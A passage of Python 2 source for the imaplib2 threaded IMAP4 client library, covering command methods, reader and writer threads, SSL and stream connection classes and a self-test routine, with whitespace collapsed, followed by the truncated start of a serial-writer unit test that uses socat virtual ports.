IMAP4rev1 extension SORT command.""" name = 'SORT' if (sort_criteria[0],sort_criteria[-1]) != ('(',')'): sort_criteria = '(%s)' % sort_criteria kw['untagged_response'] = name return self._simple_command(name, sort_criteria, charset, *search_criteria, **kw) def starttls(self, keyfile=None, certfile=None, **kw): """(typ, [data]) = starttls(keyfile=None, certfile=None) Start TLS negotiation as per RFC 2595.""" name = 'STARTTLS' if name not in self.capabilities: raise self.abort('TLS not supported by server') if hasattr(self, '_tls_established') and self._tls_established: raise self.abort('TLS session already established') try: typ, dat = self._simple_command(name) finally: self.state_change_pending.release() if typ == 'OK': import ssl self.sock = ssl.wrap_socket(self.sock, keyfile, certfile) self.read_fd = self.sock.fileno() typ, dat = self.capability() if dat == [None]: raise self.error('no CAPABILITY response from server') self.capabilities = tuple(dat[-1].upper().split()) self._tls_established = True else: raise self.error("Couldn't establish TLS session: %s" % dat) typ, dat = self._untagged_response(typ, dat, name) return self._deliver_dat(typ, dat, kw) def status(self, mailbox, names, **kw): """(typ, [data]) = status(mailbox, names) Request named status conditions for mailbox.""" name = 'STATUS' kw['untagged_response'] = name return self._simple_command(name, mailbox, names, **kw) def store(self, message_set, command, flags, **kw): """(typ, [data]) = store(message_set, command, flags) Alters flag dispositions for messages in mailbox.""" if (flags[0],flags[-1]) != ('(',')'): flags = '(%s)' % flags # Avoid quoting the flags kw['untagged_response'] = 'FETCH' return self._simple_command('STORE', message_set, command, flags, **kw) def subscribe(self, mailbox, **kw): """(typ, [data]) = subscribe(mailbox) Subscribe to new mailbox.""" try: return self._simple_command('SUBSCRIBE', mailbox, **kw) finally: self.state_change_pending.release() def thread(self, 
threading_algorithm, charset, *search_criteria, **kw): """(type, [data]) = thread(threading_alogrithm, charset, search_criteria, ...) IMAPrev1 extension THREAD command.""" name = 'THREAD' kw['untagged_response'] = name return self._simple_command(name, threading_algorithm, charset, *search_criteria, **kw) def uid(self, command, *args, **kw): """(typ, [data]) = uid(command, arg, ...) Execute "command arg ..." with messages identified by UID, rather than message number. Assumes 'command' is legal in current state. Returns response appropriate to 'command'.""" command = command.upper() if command in UID_direct: resp = command else: resp = 'FETCH' kw['untagged_response'] = resp return self._simple_command('UID', command, *args, **kw) def unsubscribe(self, mailbox, **kw): """(typ, [data]) = unsubscribe(mailbox) Unsubscribe from old mailbox.""" try: return self._simple_command('UNSUBSCRIBE', mailbox, **kw) finally: self.state_change_pending.release() def xatom(self, name, *args, **kw): """(typ, [data]) = xatom(name, arg, ...) Allow simple extension commands notified by server in CAPABILITY response. Assumes extension command 'name' is legal in current state. Returns response appropriate to extension command 'name'.""" name = name.upper() if not name in Commands: Commands[name] = ((self.state,), False) try: return self._simple_command(name, *args, **kw) finally: if self.state_change_pending.locked(): self.state_change_pending.release() # Internal methods def _append_untagged(self, typ, dat): # Append new 'dat' to end of last untagged response if same 'typ', # else append new response. 
if dat is None: dat = '' self.commands_lock.acquire() if self.untagged_responses: urn, urd = self.untagged_responses[-1] if urn != typ: urd = None else: urd = None if urd is None: urd = [] self.untagged_responses.append([typ, urd]) urd.append(dat) self.commands_lock.release() if __debug__: self._log(5, 'untagged_responses[%s] %s += ["%s"]' % (typ, len(urd)-1, dat)) def _check_bye(self): bye = self._get_untagged_response('BYE', leave=True) if bye: raise self.abort(bye[-1]) def _checkquote(self, arg): # Must quote command args if "atom-specials" present, # and not already quoted. if not isinstance(arg, basestring): return arg if len(arg) >= 2 and (arg[0],arg[-1]) in (('(',')'),('"','"')): return arg if arg and self.mustquote_cre.search(arg) is None: return arg return self._quote(arg) def _command(self, name, *args, **kw): if Commands[name][CMD_VAL_ASYNC]: cmdtyp = 'async' else: cmdtyp = 'sync' if __debug__: self._log(1, '[%s] %s %s' % (cmdtyp, name, args)) self.state_change_pending.acquire() self._end_idle() if cmdtyp == 'async': self.state_change_pending.release() else: # Need to wait for all async commands to complete self._check_bye() self.commands_lock.acquire() if self.tagged_commands: self.state_change_free.clear() need_event = True else: need_event = False self.commands_lock.release() if need_event: if __debug__: self._log(4, 'sync command %s waiting for empty commands Q' % name) self.state_change_free.wait() if __debug__: self._log(4, 'sync command %s proceeding' % name) if self.state not in Commands[name][CMD_VAL_STATES]: self.literal = None raise self.error('command %s illegal in state %s' % (name, self.state)) self._check_bye() for typ in ('OK', 'NO', 'BAD'): self._get_untagged_response(typ) if self._get_untagged_response('READ-ONLY', leave=True) and not self.is_readonly: self.literal = None raise self.readonly('mailbox status changed to READ-ONLY') if self.Terminate: raise self.abort('connection closed') rqb = self._request_push(name=name, **kw) data = 
'%s %s' % (rqb.tag, name) for arg in args: if arg is None: continue data = '%s %s' % (data, self._checkquote(arg)) literal = self.literal if literal is not None: self.literal = None if isinstance(literal, basestring): literator = None data = '%s {%s}' % (data, len(literal)) else: literator = literal if __debug__: self._log(4, 'data=%s' % data) rqb.data = '%s%s' % (data, CRLF) if literal is None: self.ouq.put(rqb) return rqb # Must setup continuation expectancy *before* ouq.put crqb = self._request_push(tag='continuation') self.ouq.put(rqb) while True: # Wait for continuation response ok, data = crqb.get_response('command: %s => %%s' % name) if __debug__: self._log(3, 'continuation => %s, %s' % (ok, data)) # NO/BAD response? if not ok: break # Send literal if literator is not None: literal = literator(data, rqb) if literal is None: break if literator is not None: # Need new request for next continuation response crqb = self._request_push(tag='continuation') if __debug__: self._log(4, 'write literal size %s' % len(literal)) crqb.data = '%s%s' % (literal, CRLF) self.ouq.put(crqb) if literator is None: break return rqb def _command_complete(self, rqb, kw): # Called for non-callback commands typ, dat = rqb.get_response('command: %s => %%s' % rqb.name) self._check_bye() if typ == 'BAD': if __debug__: self._print_log() raise self.error('%s command error: %s %s. 
Data: %.100s' % (rqb.name, typ, dat, rqb.data)) if 'untagged_response' in kw: return self._untagged_response(typ, dat, kw['untagged_response']) return typ, dat def _command_completer(self, (response, cb_arg, error)): # Called for callback commands rqb, kw = cb_arg rqb.callback = kw['callback'] rqb.callback_arg = kw.get('cb_arg') if error is not None: if __debug__: self._print_log() typ, val = error rqb.abort(typ, val) return bye = self._get_untagged_response('BYE', leave=True) if bye: rqb.abort(self.abort, bye[-1]) return typ, dat = response if typ == 'BAD': if __debug__: self._print_log() rqb.abort(self.error, '%s command error: %s %s. Data: %.100s' % (rqb.name, typ, dat, rqb.data)) return if 'untagged_response' in kw: response = self._untagged_response(typ, dat, kw['untagged_response']) rqb.deliver(response) def _deliver_dat(self, typ, dat, kw): if 'callback' in kw: kw['callback'](((typ, dat), kw.get('cb_arg'), None)) return typ, dat def _deliver_exc(self, exc, dat, kw): if 'callback' in kw: kw['callback']((None, kw.get('cb_arg'), (exc, dat))) raise exc(dat) def _end_idle(self): irqb = self.idle_rqb if irqb is None: return self.idle_rqb = None self.idle_timeout = None irqb.data = 'DONE%s' % CRLF self.ouq.put(irqb) if __debug__: self._log(2, 'server IDLE finished') def _get_untagged_response(self, name, leave=False): self.commands_lock.acquire() for i, (typ, dat) in enumerate(self.untagged_responses): if typ == name: if not leave: del self.untagged_responses[i] self.commands_lock.release() if __debug__: self._log(5, '_get_untagged_response(%s) => %s' % (name, dat)) return dat self.commands_lock.release() return None def _match(self, cre, s): # Run compiled regular expression 'cre' match method on 's'. # Save result, return success. 
self.mo = cre.match(s) return self.mo is not None def _put_response(self, resp): if self._expecting_data > 0: rlen = len(resp) dlen = min(self._expecting_data, rlen) self._expecting_data -= dlen if rlen <= dlen: self._accumulated_data.append(resp) return self._accumulated_data.append(resp[:dlen]) resp = resp[dlen:] if self._accumulated_data: typ, dat = self._literal_expected self._append_untagged(typ, (dat, ''.join(self._accumulated_data))) self._accumulated_data = [] # Protocol mandates all lines terminated by CRLF resp = resp[:-2] if 'continuation' in self.tagged_commands: continuation_expected = True else: continuation_expected = False if self._literal_expected is not None: dat = resp if self._match(self.literal_cre, dat): self._literal_expected[1] = dat self._expecting_data = int(self.mo.group('size')) if __debug__: self._log(4, 'expecting literal size %s' % self._expecting_data) return typ = self._literal_expected[0] self._literal_expected = None self._append_untagged(typ, dat) # Tail if __debug__: self._log(4, 'literal completed') else: # Command completion response? if self._match(self.tagre, resp): tag = self.mo.group('tag') typ = self.mo.group('type') dat = self.mo.group('data') if not tag in self.tagged_commands: if __debug__: self._log(1, 'unexpected tagged response: %s' % resp) else: self._request_pop(tag, (typ, [dat])) else: dat2 = None # '*' (untagged) responses? if not self._match(self.untagged_response_cre, resp): if self._match(self.untagged_status_cre, resp): dat2 = self.mo.group('data2') if self.mo is None: # Only other possibility is '+' (continuation) response... 
if self._match(self.continuation_cre, resp): if not continuation_expected: if __debug__: self._log(1, "unexpected continuation response: '%s'" % resp) return self._request_pop('continuation', (True, self.mo.group('data'))) return if __debug__: self._log(1, "unexpected response: '%s'" % resp) return typ = self.mo.group('type') dat = self.mo.group('data') if dat is None: dat = '' # Null untagged response if dat2: dat = dat + ' ' + dat2 # Is there a literal to come? if self._match(self.literal_cre, dat): self._expecting_data = int(self.mo.group('size')) if __debug__: self._log(4, 'read literal size %s' % self._expecting_data) self._literal_expected = [typ, dat] return self._append_untagged(typ, dat) if typ != 'OK': self._end_idle() # Bracketed response information? if typ in ('OK', 'NO', 'BAD') and self._match(self.response_code_cre, dat): self._append_untagged(self.mo.group('type'), self.mo.group('data')) # Command waiting for aborted continuation response? if continuation_expected: self._request_pop('continuation', (False, resp)) # Bad news? 
if typ in ('NO', 'BAD', 'BYE'): if typ == 'BYE': self.Terminate = True if __debug__: self._log(1, '%s response: %s' % (typ, dat)) def _quote(self, arg): return '"%s"' % arg.replace('\\', '\\\\').replace('"', '\\"') def _request_pop(self, name, data): if __debug__: self._log(4, '_request_pop(%s, %s)' % (name, data)) self.commands_lock.acquire() rqb = self.tagged_commands.pop(name) if not self.tagged_commands: self.state_change_free.set() self.commands_lock.release() rqb.deliver(data) def _request_push(self, tag=None, name=None, **kw): self.commands_lock.acquire() rqb = Request(self, name=name, **kw) if tag is None: tag = rqb.tag self.tagged_commands[tag] = rqb self.commands_lock.release() if __debug__: self._log(4, '_request_push(%s, %s, %s)' % (tag, name, `kw`)) return rqb def _simple_command(self, name, *args, **kw): if 'callback' in kw: rqb = self._command(name, callback=self._command_completer, *args) rqb.callback_arg = (rqb, kw) return (None, None) return self._command_complete(self._command(name, *args), kw) def _untagged_response(self, typ, dat, name): if typ == 'NO': return typ, dat data = self._get_untagged_response(name) if not data: return typ, [None] return typ, data # Threads def _close_threads(self): if __debug__: self._log(1, '_close_threads') self.ouq.put(None) self.wrth.join() if __debug__: self._log(1, 'call shutdown') self.shutdown() self.rdth.join() self.inth.join() def _handler(self): threading.currentThread().setName(self.identifier + 'handler') time.sleep(0.1) # Don't start handling before main thread ready if __debug__: self._log(1, 'starting') typ, val = self.abort, 'connection terminated' while not self.Terminate: try: if self.idle_timeout is not None: timeout = self.idle_timeout - time.time() if timeout <= 0: timeout = 1 if __debug__: if self.idle_rqb is not None: self._log(5, 'server IDLING, timeout=%.2f' % timeout) else: timeout = None line = self.inq.get(True, timeout) except Queue.Empty: if self.idle_rqb is None: continue if 
self.idle_timeout > time.time(): continue if __debug__: self._log(2, 'server IDLE timedout') line = IDLE_TIMEOUT_RESPONSE if line is None: if __debug__: self._log(1, 'inq None - terminating') break if not isinstance(line, basestring): typ, val = line break try: self._put_response(line) except: typ, val = self.error, 'program error: %s - %s' % sys.exc_info()[:2] break self.Terminate = True if __debug__: self._log(1, 'terminating: %s' % `val`) while not self.ouq.empty(): try: self.ouq.get_nowait().abort(typ, val) except Queue.Empty: break self.ouq.put(None) self.commands_lock.acquire() for name in self.tagged_commands.keys(): rqb = self.tagged_commands.pop(name) rqb.abort(typ, val) self.state_change_free.set() self.commands_lock.release() if __debug__: self._log(1, 'finished') if hasattr(select_module, "poll"): def _reader(self): threading.currentThread().setName(self.identifier + 'reader') if __debug__: self._log(1, 'starting using poll') def poll_error(state): PollErrors = { select.POLLERR: 'Error', select.POLLHUP: 'Hang up', select.POLLNVAL: 'Invalid request: descriptor not open', } return ' '.join([PollErrors[s] for s in PollErrors.keys() if (s & state)]) line_part = '' poll = select.poll() poll.register(self.read_fd, select.POLLIN) rxzero = 0 while not self.Terminate: if self.state == LOGOUT: timeout = 1 else: timeout = READ_POLL_TIMEMOUT try: r = poll.poll(timeout) if __debug__: self._log(5, 'poll => %s' % `r`) if not r: continue # Timeout fd,state = r[0] if state & select.POLLIN: data = self.read(32768) # Drain ssl buffer if present start = 0 dlen = len(data) if __debug__: self._log(5, 'rcvd %s' % dlen) if dlen == 0: rxzero += 1 if rxzero > 5: raise IOError("Too many read 0") time.sleep(0.1) else: rxzero = 0 while True: stop = data.find('\n', start) if stop < 0: line_part += data[start:] break stop += 1 line_part, start, line = \ '', stop, line_part + data[start:stop] if __debug__: self._log(4, '< %s' % line) self.inq.put(line) if state & ~(select.POLLIN): 
raise IOError(poll_error(state)) except: reason = 'socket error: %s - %s' % sys.exc_info()[:2] if __debug__: if not self.Terminate: self._print_log() if self.debug: self.debug += 4 # Output all self._log(1, reason) self.inq.put((self.abort, reason)) break poll.unregister(self.read_fd) if __debug__: self._log(1, 'finished') else: # No "poll" - use select() def _reader(self): threading.currentThread().setName(self.identifier + 'reader') if __debug__: self._log(1, 'starting using select') line_part = '' rxzero = 0 while not self.Terminate: if self.state == LOGOUT: timeout = 1 else: timeout = READ_POLL_TIMEMOUT try: r,w,e = select.select([self.read_fd], [], [], timeout) if __debug__: self._log(5, 'select => %s, %s, %s' % (r,w,e)) if not r: # Timeout continue data = self.read(32768) # Drain ssl buffer if present start = 0 dlen = len(data) if __debug__: self._log(5, 'rcvd %s' % dlen) if dlen == 0: rxzero += 1 if rxzero > 5: raise IOError("Too many read 0") time.sleep(0.1) else: rxzero = 0 while True: stop = data.find('\n', start) if stop < 0: line_part += data[start:] break stop += 1 line_part, start, line = \ '', stop, line_part + data[start:stop] if __debug__: self._log(4, '< %s' % line) self.inq.put(line) except: reason = 'socket error: %s - %s' % sys.exc_info()[:2] if __debug__: if not self.Terminate: self._print_log() if self.debug: self.debug += 4 # Output all self._log(1, reason) self.inq.put((self.abort, reason)) break if __debug__: self._log(1, 'finished') def _writer(self): threading.currentThread().setName(self.identifier + 'writer') if __debug__: self._log(1, 'starting') reason = 'Terminated' while not self.Terminate: rqb = self.ouq.get() if rqb is None: break # Outq flushed try: self.send(rqb.data) if __debug__: self._log(4, '> %s' % rqb.data) except: reason = 'socket error: %s - %s' % sys.exc_info()[:2] if __debug__: if not self.Terminate: self._print_log() if self.debug: self.debug += 4 # Output all self._log(1, reason) rqb.abort(self.abort, reason) break 
self.inq.put((self.abort, reason)) if __debug__: self._log(1, 'finished') # Debugging if __debug__: def _init_debug(self, debug=None, debug_file=None): self.debug = debug is not None and debug or Debug is not None and Debug or 0 self.debug_file = debug_file is not None and debug_file or sys.stderr self.debug_lock = threading.Lock() self._cmd_log_len = 20 self._cmd_log_idx = 0 self._cmd_log = {} # Last `_cmd_log_len' interactions if self.debug: self._mesg('imaplib2 version %s' % __version__) self._mesg('imaplib2 debug level %s' % self.debug) def _dump_ur(self, lvl): if lvl > self.debug: return l = self.untagged_responses if not l: return t = '\n\t\t' l = map(lambda x:'%s: "%s"' % (x[0], x[1][0] and '" "'.join(x[1]) or ''), l) self.debug_lock.acquire() self._mesg('untagged responses dump:%s%s' % (t, t.join(l))) self.debug_lock.release() def _log(self, lvl, line): if lvl > self.debug: return if line[-2:] == CRLF: line = line[:-2] + '\\r\\n' tn = threading.currentThread().getName() if self.debug >= 4: self.debug_lock.acquire() self._mesg(line, tn) self.debug_lock.release() return # Keep log of last `_cmd_log_len' interactions for debugging. 
self._cmd_log[self._cmd_log_idx] = (line, tn, time.time()) self._cmd_log_idx += 1 if self._cmd_log_idx >= self._cmd_log_len: self._cmd_log_idx = 0 def _mesg(self, s, tn=None, secs=None): if secs is None: secs = time.time() if tn is None: tn = threading.currentThread().getName() tm = time.strftime('%M:%S', time.localtime(secs)) self.debug_file.write(' %s.%02d %s %s\n' % (tm, (secs*100)%100, tn, s)) self.debug_file.flush() def _print_log(self): self.debug_lock.acquire() i, n = self._cmd_log_idx, self._cmd_log_len if n: self._mesg('last %d log messages:' % n) while n: try: self._mesg(*self._cmd_log[i]) except: pass i += 1 if i >= self._cmd_log_len: i = 0 n -= 1 self.debug_lock.release() class IMAP4_SSL(IMAP4): """IMAP4 client class over SSL connection Instantiate with: IMAP4_SSL(host=None, port=None, keyfile=None, certfile=None, debug=None, debug_file=None) host - host's name (default: localhost); port - port number (default: standard IMAP4 SSL port); keyfile - PEM formatted file that contains your private key (default: None); certfile - PEM formatted certificate chain file (default: None); debug - debug level (default: 0 - no debug); debug_file - debug stream (default: sys.stderr). For more documentation see the docstring of the parent class IMAP4. """ def __init__(self, host=None, port=None, keyfile=None, certfile=None, debug=None, debug_file=None, identifier=None): self.keyfile = keyfile self.certfile = certfile IMAP4.__init__(self, host, port, debug, debug_file, identifier) def open(self, host=None, port=None): """open(host=None, port=None) Setup secure connection to remote server on "host:port" (default: localhost:standard IMAP4 SSL port). 
This connection will be used by the routines: read, send, shutdown, socket, ssl.""" self.host = host is not None and host or '' self.port = port is not None and port or IMAP4_SSL_PORT self.sock = self.open_socket() try: import ssl self.sslobj = ssl.wrap_socket(self.sock, self.keyfile, self.certfile) except ImportError: self.sslobj = socket.ssl(self.sock, self.keyfile, self.certfile) self.read_fd = self.sock.fileno() def read(self, size): """data = read(size) Read at most 'size' bytes from remote.""" if self.decompressor is None: return self.sslobj.read(size) if self.decompressor.unconsumed_tail: data = self.decompressor.unconsumed_tail else: data = self.sslobj.read(8192) return self.decompressor.decompress(data, size) def send(self, data): """send(data) Send 'data' to remote.""" if self.compressor is not None: data = self.compressor.compress(data) data += self.compressor.flush(zlib.Z_SYNC_FLUSH) # NB: socket.ssl needs a "sendall" method to match socket objects. bytes = len(data) while bytes > 0: sent = self.sslobj.write(data) if sent == bytes: break # avoid copy data = data[sent:] bytes = bytes - sent def ssl(self): """ssl = ssl() Return socket.ssl instance used to communicate with the IMAP4 server.""" return self.sslobj class IMAP4_stream(IMAP4): """IMAP4 client class over a stream Instantiate with: IMAP4_stream(command, debug=None, debug_file=None) command - string that can be passed to subprocess.Popen(); debug - debug level (default: 0 - no debug); debug_file - debug stream (default: sys.stderr). For more documentation see the docstring of the parent class IMAP4. 
""" def __init__(self, command, debug=None, debug_file=None, identifier=None): self.command = command self.host = command self.port = None self.sock = None self.writefile, self.readfile = None, None self.read_fd = None IMAP4.__init__(self, debug=debug, debug_file=debug_file, identifier=identifier) def open(self, host=None, port=None): """open(host=None, port=None) Setup a stream connection via 'self.command'. This connection will be used by the routines: read, send, shutdown, socket.""" from subprocess import Popen, PIPE self._P = Popen(self.command, shell=True, stdin=PIPE, stdout=PIPE, close_fds=True) self.writefile, self.readfile = self._P.stdin, self._P.stdout self.read_fd = self.readfile.fileno() def read(self, size): """Read 'size' bytes from remote.""" if self.decompressor is None: return os.read(self.read_fd, size) if self.decompressor.unconsumed_tail: data = self.decompressor.unconsumed_tail else: data = os.read(self.read_fd, 8192) return self.decompressor.decompress(data, size) def send(self, data): """Send data to remote.""" if self.compressor is not None: data = self.compressor.compress(data) data += self.compressor.flush(zlib.Z_SYNC_FLUSH) self.writefile.write(data) self.writefile.flush() def shutdown(self): """Close I/O established in "open".""" self.readfile.close() self.writefile.close() class _Authenticator(object): """Private class to provide en/de-coding for base64 authentication conversation.""" def __init__(self, mechinst): self.mech = mechinst # Callable object to provide/process data def process(self, data, rqb): ret = self.mech(self.decode(data)) if ret is None: return '*' # Abort conversation return self.encode(ret) def encode(self, inp): # # Invoke binascii.b2a_base64 iteratively with # short even length buffers, strip the trailing # line feed from the result and append. "Even" # means a number that factors to both 6 and 8, # so when it gets to the end of the 8-bit input # there's no partial 6-bit output. 
# oup = '' while inp: if len(inp) > 48: t = inp[:48] inp = inp[48:] else: t = inp inp = '' e = binascii.b2a_base64(t) if e: oup = oup + e[:-1] return oup def decode(self, inp): if not inp: return '' return binascii.a2b_base64(inp) class _IdleCont(object): """When process is called, server is in IDLE state and will send asynchronous changes.""" def __init__(self, parent, timeout): self.parent = parent self.timeout = timeout is not None and timeout or IDLE_TIMEOUT self.parent.idle_timeout = self.timeout + time.time() def process(self, data, rqb): self.parent.idle_rqb = rqb self.parent.idle_timeout = self.timeout + time.time() if __debug__: self.parent._log(2, 'server IDLE started, timeout in %.2f secs' % self.timeout) return None Mon2num = {'Jan': 1, 'Feb': 2, 'Mar': 3, 'Apr': 4, 'May': 5, 'Jun': 6, 'Jul': 7, 'Aug': 8, 'Sep': 9, 'Oct': 10, 'Nov': 11, 'Dec': 12} InternalDate = re.compile(r'.*INTERNALDATE "' r'(?P<day>[ 0123][0-9])-(?P<mon>[A-Z][a-z][a-z])-(?P<year>[0-9][0-9][0-9][0-9])' r' (?P<hour>[0-9][0-9]):(?P<min>[0-9][0-9]):(?P<sec>[0-9][0-9])' r' (?P<zonen>[-+])(?P<zoneh>[0-9][0-9])(?P<zonem>[0-9][0-9])' r'"') def Internaldate2Time(resp): """time_tuple = Internaldate2Time(resp) Convert IMAP4 INTERNALDATE to UT.""" mo = InternalDate.match(resp) if not mo: return None mon = Mon2num[mo.group('mon')] zonen = mo.group('zonen') day = int(mo.group('day')) year = int(mo.group('year')) hour = int(mo.group('hour')) min = int(mo.group('min')) sec = int(mo.group('sec')) zoneh = int(mo.group('zoneh')) zonem = int(mo.group('zonem')) # INTERNALDATE timezone must be subtracted to get UT zone = (zoneh*60 + zonem)*60 if zonen == '-': zone = -zone tt = (year, mon, day, hour, min, sec, -1, -1, -1) utc = time.mktime(tt) # Following is necessary because the time module has no 'mkgmtime'. # 'mktime' assumes arg in local timezone, so adds timezone/altzone. 
lt = time.localtime(utc) if time.daylight and lt[-1]: zone = zone + time.altzone else: zone = zone + time.timezone return time.localtime(utc - zone) Internaldate2tuple = Internaldate2Time # (Backward compatible) def Time2Internaldate(date_time): """'"DD-Mmm-YYYY HH:MM:SS +HHMM"' = Time2Internaldate(date_time) Convert 'date_time' to IMAP4 INTERNALDATE representation.""" if isinstance(date_time, (int, float)): tt = time.localtime(date_time) elif isinstance(date_time, (tuple, time.struct_time)): tt = date_time elif isinstance(date_time, str) and (date_time[0],date_time[-1]) == ('"','"'): return date_time # Assume in correct format else: raise ValueError("date_time not of a known type") dt = time.strftime("%d-%b-%Y %H:%M:%S", tt) if dt[0] == '0': dt = ' ' + dt[1:] if time.daylight and tt[-1]: zone = -time.altzone else: zone = -time.timezone return '"' + dt + " %+03d%02d" % divmod(zone//60, 60) + '"' FLAGS_cre = re.compile(r'.*FLAGS \((?P<flags>[^\)]*)\)') def ParseFlags(resp): """('flag', ...) 
= ParseFlags(line) Convert IMAP4 flags response to python tuple.""" mo = FLAGS_cre.match(resp) if not mo: return () return tuple(mo.group('flags').split()) if __name__ == '__main__': # To test: invoke either as 'python imaplib2.py [IMAP4_server_hostname]', # or as 'python imaplib2.py -s "rsh IMAP4_server_hostname exec /etc/rimapd"' # or as 'python imaplib2.py -l "keyfile[:certfile]" [IMAP4_SSL_server_hostname]' import getopt, getpass try: optlist, args = getopt.getopt(sys.argv[1:], 'd:l:s:p:') except getopt.error, val: optlist, args = (), () debug, port, stream_command, keyfile, certfile = (None,)*5 for opt,val in optlist: if opt == '-d': debug = int(val) elif opt == '-l': try: keyfile,certfile = val.split(':') except ValueError: keyfile,certfile = val,val elif opt == '-p': port = int(val) elif opt == '-s': stream_command = val if not args: args = (stream_command,) if not args: args = ('',) if not port: port = (keyfile is not None) and IMAP4_SSL_PORT or IMAP4_PORT host = args[0] USER = getpass.getuser() data = open(os.path.exists("test.data") and "test.data" or __file__).read(1000) test_mesg = 'From: %(user)s@localhost%(lf)sSubject: IMAP4 test%(lf)s%(lf)s%(data)s' \ % {'user':USER, 'lf':'\n', 'data':data} test_seq1 = [ ('list', ('""', '%')), ('create', ('/tmp/imaplib2_test.0',)), ('rename', ('/tmp/imaplib2_test.0', '/tmp/imaplib2_test.1')), ('CREATE', ('/tmp/imaplib2_test.2',)), ('append', ('/tmp/imaplib2_test.2', None, None, test_mesg)), ('list', ('/tmp', 'imaplib2_test*')), ('select', ('/tmp/imaplib2_test.2',)), ('search', (None, 'SUBJECT', 'IMAP4 test')), ('fetch', ('1', '(FLAGS INTERNALDATE RFC822)')), ('store', ('1', 'FLAGS', '(\Deleted)')), ('namespace', ()), ('expunge', ()), ('recent', ()), ('close', ()), ] test_seq2 = ( ('select', ()), ('response',('UIDVALIDITY',)), ('response', ('EXISTS',)), ('append', (None, None, None, test_mesg)), ('uid', ('SEARCH', 'SUBJECT', 'IMAP4 test')), ('uid', ('SEARCH', 'ALL')), ('uid', ('THREAD', 'references', 'UTF-8', 
'(SEEN)')), ('recent', ()), ) AsyncError = None def responder((response, cb_arg, error)): global AsyncError cmd, args = cb_arg if error is not None: AsyncError = error M._mesg('[cb] ERROR %s %.100s => %s' % (cmd, args, error)) return typ, dat = response M._mesg('[cb] %s %.100s => %s %.100s' % (cmd, args, typ, dat)) if typ == 'NO': AsyncError = (Exception, dat[0]) def run(cmd, args, cb=True): if AsyncError: M.logout() typ, val = AsyncError raise typ(val) M._mesg('%s %.100s' % (cmd, args)) try: if cb: typ, dat = getattr(M, cmd)(callback=responder, cb_arg=(cmd, args), *args) if M.debug: M._mesg('%s %.100s => %s %.100s' % (cmd, args, typ, dat)) else: typ, dat = getattr(M, cmd)(*args) M._mesg('%s %.100s => %s %.100s' % (cmd, args, typ, dat)) except: M.logout() raise if typ == 'NO': M.logout() raise Exception(dat[0]) return dat try: threading.currentThread().setName('main') if keyfile is not None: if not keyfile: keyfile = None if not certfile: certfile = None M = IMAP4_SSL(host=host, port=port, keyfile=keyfile, certfile=certfile, debug=debug, identifier='') elif stream_command: M = IMAP4_stream(stream_command, debug=debug, identifier='') else: M = IMAP4(host=host, port=port, debug=debug, identifier='') if M.state != 'AUTH': # Login needed PASSWD = getpass.getpass("IMAP password for %s on %s: " % (USER, host or "localhost")) test_seq1.insert(0, ('login', (USER, PASSWD))) M._mesg('PROTOCOL_VERSION = %s' % M.PROTOCOL_VERSION) M._mesg('CAPABILITIES = %r' % (M.capabilities,)) if 'COMPRESS=DEFLATE' in M.capabilities: M.enable_compression() for cmd,args in test_seq1: run(cmd, args) for ml in run('list', ('/tmp/', 'imaplib2_test%'), cb=False): mo = re.match(r'.*"([^"]+)"$', ml) if mo: path = mo.group(1) else: path = ml.split()[-1] run('delete', (path,)) for cmd,args in test_seq2: if (cmd,args) != ('uid', ('SEARCH', 'SUBJECT', 'IMAP4 test')): run(cmd, args) continue dat = run(cmd, args, cb=False) uid = dat[-1].split() if not uid: continue run('uid', ('FETCH', uid[-1], '(FLAGS 
INTERNALDATE RFC822.SIZE RFC822.HEADER RFC822.TEXT)')) run('uid', ('STORE', uid[-1], 'FLAGS', '(\Deleted)')) run('expunge', ()) if 'IDLE' in M.capabilities: run('idle', (2,), cb=False) run('idle', (99,), cb=True) # Asynchronous, to test interruption of 'idle' by 'noop' time.sleep(1) run('noop', (), cb=False) run('logout', (), cb=False) if debug: M._mesg('') M._print_log() M._mesg('') M._mesg('unused untagged responses in order, most recent last:') for typ,dat in M.pop_untagged_responses(): M._mesg('\t%s %s' % (typ, dat)) print 'All tests OK.' except: print 'Tests failed.' if not debug: print ''' If you would like to see debugging output, try: %s -d5 ''' % sys.argv[0] raise
test_serial_writer.py
#!/usr/bin/env python3
"""Unit test for logger.writers.serial_writer.

Creates a pair of linked virtual serial ports with socat, then verifies
that records written to one end with SerialWriter can be read back from
the other end with SerialReader.
"""
import logging
import os
import subprocess
import sys
import tempfile
import time
import threading
import unittest
import warnings

from os.path import dirname, realpath

sys.path.append(dirname(dirname(dirname(realpath(__file__)))))
from logger.readers.serial_reader import SerialReader  # noqa: E402
from logger.writers.serial_writer import SerialWriter  # noqa: E402

SAMPLE_DATA = """2017-11-04T05:12:19.275337Z $HEHDT,234.76,T*1b
2017-11-04T05:12:19.527360Z $HEHDT,234.73,T*1e
2017-11-04T05:12:19.781738Z $HEHDT,234.72,T*1f
2017-11-04T05:12:20.035450Z $HEHDT,234.72,T*1f
2017-11-04T05:12:22.312971Z $HEHDT,235.66,T*1b"""

# Expected reads of the first record when the reader is capped at max_bytes=2
SAMPLE_MAX_BYTES_2 = ['$H', 'EH', 'DT', ',2', '34', '.7', '6,', 'T*', '1b']

# Expected read sequence when reads time out between records
SAMPLE_TIMEOUT = [None, '$HEHDT,234.76,T*1b', None, None,
                  '$HEHDT,234.73,T*1e', None, None,
                  '$HEHDT,234.72,T*1f', None, None,
                  '$HEHDT,234.72,T*1f', None, None]


class SimSerialPort:
    """Create a virtual serial port and feed stored logfile data to it."""
    ############################
    def __init__(self, port, baudrate=9600, bytesize=8, parity='N',
                 stopbits=1, timeout=None, xonxoff=False, rtscts=False,
                 write_timeout=None, dsrdtr=False, inter_byte_timeout=None,
                 exclusive=None):
        """We'll create two virtual ports: 'port' and 'port_in'; we will
        write to port_in and read the values back out from port."""
        self.read_port = port
        self.write_port = port + '_in'
        # NOTE: these params are recorded for reference; the key was
        # previously misspelled 'byteside' — fixed to 'bytesize'.
        self.serial_params = {'baudrate': baudrate,
                              'bytesize': bytesize,
                              'parity': parity,
                              'stopbits': stopbits,
                              'timeout': timeout,
                              'xonxoff': xonxoff,
                              'rtscts': rtscts,
                              'write_timeout': write_timeout,
                              'dsrdtr': dsrdtr,
                              'inter_byte_timeout': inter_byte_timeout,
                              'exclusive': exclusive}
        self.quit_flag = False

        # Finally, find path to socat executable
        self.socat_path = None
        for socat_path in ['/usr/bin/socat', '/usr/local/bin/socat']:
            if os.path.exists(socat_path) and os.path.isfile(socat_path):
                self.socat_path = socat_path
        if not self.socat_path:
